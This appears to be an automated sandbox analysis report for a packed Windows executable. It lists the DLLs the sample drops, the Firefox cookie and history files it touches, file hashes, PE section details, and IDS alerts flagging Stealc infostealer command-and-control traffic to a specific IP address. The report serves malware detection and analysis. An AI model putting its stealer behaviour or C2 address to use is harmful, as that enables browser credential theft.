Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 86aY1jzemK.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.946500981088721
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'826'816 bytes
MD5:	9bbc1db6151e2794c605440a57bcbe4d
SHA1:	888858c25bf9bb5d8c938bc01d343bb5799cc8d7
SHA256:	c7477e851ddc9424bb16303e6568aeeda074bf7dfad539e7df78aee2833119b0
SHA512:	2041b4220c23b507a9d6da16a5c6a21417bcdfe1d996b387a62a2c538722124ffc884f8a22ad95a2af72a82ee525cf38be758fadcb0a6a2a794ba70464faedcf
SSDEEP:	49152:fbmj7USbEfHFa+YHJwetYxIYjYfethPZElWYdM8rst:qcnla3Y+iYWtnenQ
TLSH:	D3853309779FA5F9C14E66FE1EEB3B702BA49FA174BEAFC3830E0760449755112D204A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0xa92000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F07807C290Ah
movsx ebx, byte ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
push es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25d1f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x25b000	0x22800	18a67bfb15ebceaeef7b6bbcb09d884f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x25c000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x25d000	0x1000	0x200	c60c4959cc8d384ac402730cc6842bb0	False	0.1328125	data	0.9064079259880791	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x25e000	0x29b000	0x200	aeec3a7af2add2878773ea96e8e74417	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
uwrqvymk	0x4f9000	0x198000	0x197e00	5f5e8f0be210e3db9e03d55f90cfe8c6	False	0.9945841633466136	data	7.953035524358767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ibgpdbrl	0x691000	0x1000	0x400	70cf47092379e7746a62e0bce376e3d1	False	0.779296875	data	5.988925737403321	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x692000	0x3000	0x2200	fa5de06175870c80ea76af6ca87f1b26	False	0.05744485294117647	DOS executable (COM)	0.796101708420393	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-26T06:00:09.358020+0200	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:09.722013+0200	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:09.723464+0200	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.37	80	192.168.2.8	49704	TCP
2024-09-26T06:00:09.954248+0200	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:10.013564+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.37	80	192.168.2.8	49704	TCP
2024-09-26T06:00:11.653888+0200	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:12.120171+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:18.247351+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:19.321070+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:19.926526+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:20.458925+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:22.422659+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP
2024-09-26T06:00:23.942013+0200	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.8	49704	185.215.113.37	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 06:00:08.426574945 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:08.431411028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:08.431484938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:08.431843042 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:08.436625004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.120917082 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.121020079 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.123891115 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.128689051 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.357800007 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.358020067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.360047102 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.364808083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.721885920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.721903086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.722012997 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.723464012 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.723541021 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.728013039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:09.732845068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.954134941 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:09.954183102 CEST	80	49704	185.215.113.37	192.168.2.8
